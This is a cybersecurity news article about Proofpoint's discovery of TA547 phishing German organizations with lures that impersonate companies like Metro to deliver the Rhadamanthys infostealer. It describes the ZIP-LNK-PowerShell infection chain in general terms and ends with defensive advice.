Cybersecurity firm Proofpoint has discovered a phishing campaign targeting German organizations. The culprit, a financially motivated threat actor known as TA547, has been leveraging emails to distribute Rhadamanthys, a malware program designed to pilfer sensitive data.
This campaign marks TA547's first foray into deploying Rhadamanthys, a malware strain popular among various cybercriminal groups. Proofpoint researchers also believe TA547 may have utilized a large language model (LLM) to generate a PowerShell script used within the attack.
TA547, active since at least late 2017, has a history of employing phishing tactics to deliver a diverse arsenal of malware targeting both Windows and Android systems. In the past, TA547 has been linked to the distribution of ZLoader, Gootkit, DanaBot, Ursnif, and even the ransomware variant Adhubllka.
The current campaign specifically targets German organizations across various industries. Phishing emails impersonate legitimate German companies, such as retail giant Metro. These emails typically contain a password-protected ZIP archive. Once opened, the archive prompts the user for the password, which in this case is "MAR26". Within the archive lies an LNK file. Executing this file triggers a PowerShell script that retrieves a malicious Rhadamanthys executable stored remotely. The PowerShell script then loads this executable directly into memory, bypassing traditional disk-based methods of malware execution.
This tactic allows the malware to operate under the radar for a longer period, potentially evading detection by security software.
Proofpoint's findings indicate a shift in TA547's preferred delivery method. Throughout 2023, the threat actor primarily relied on compressed JavaScript attachments to deliver malware payloads. However, in early March of 2024, TA547 appears to have transitioned to compressed LNK files.
While the current campaign focuses on German organizations, Proofpoint has observed TA547 targeting entities in other regions recently, including Spain, Switzerland, Austria, and the United States.
Organizations are advised to remain vigilant against phishing attempts. Employees should be wary of unsolicited emails, particularly those containing attachments or urging them to click on links. Verifying the sender's identity and scrutinizing email content for inconsistencies are crucial steps in mitigating the risk of falling victim to a phishing attack.
Implementing robust security measures, including email filtering and endpoint detection and response (EDR) solutions, is also paramount in safeguarding against such threats.